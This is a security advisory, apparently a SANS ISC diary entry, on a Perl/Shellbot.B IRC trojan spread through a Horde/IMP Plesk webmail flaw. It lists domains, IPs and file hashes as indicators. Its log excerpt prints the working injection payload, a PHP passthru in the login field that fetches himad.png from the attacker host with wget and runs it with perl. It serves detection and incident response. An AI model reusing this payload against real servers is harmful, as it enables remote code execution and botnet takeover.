Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)
ISC received a submission from Zach of a Perl/Shellbot.B trojan served by fallencrafts[.]info/download/himad.png. The trojan has limited detection on Virustotal  and the script contains a “hostauth” of sosick[.]net and the IRC server where the compromised systems are connecting to is located at 126.96.36.199. What we have so far, it appears it is exploiting older version of Plesk.
This Bot exploit a vulnerability in Horde/IMP Plesk webmail, you might want to review system logs for signs of the server attempting to connect outbound to fallencrafts[.]info which appears to be exploiting a Plesk  vulnerability and maybe other to connect to 188.8.131.52 which a lot of activity has been reported to DShield for the past 3 days.
Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 184.108.40.206 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]
If a system is compromised, you are likely going to see similar Apache processes:
apache 10760 0.0 0.0 10816 1084 ? S 11:09 0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache 10761 0.0 0.0 42320 1392 ? S 11:09 0:00 wget http://fallencrafts.info/download/himad.png
md5: bca0b2a88338427ba2e8729e710122cd himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9 himad.png
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu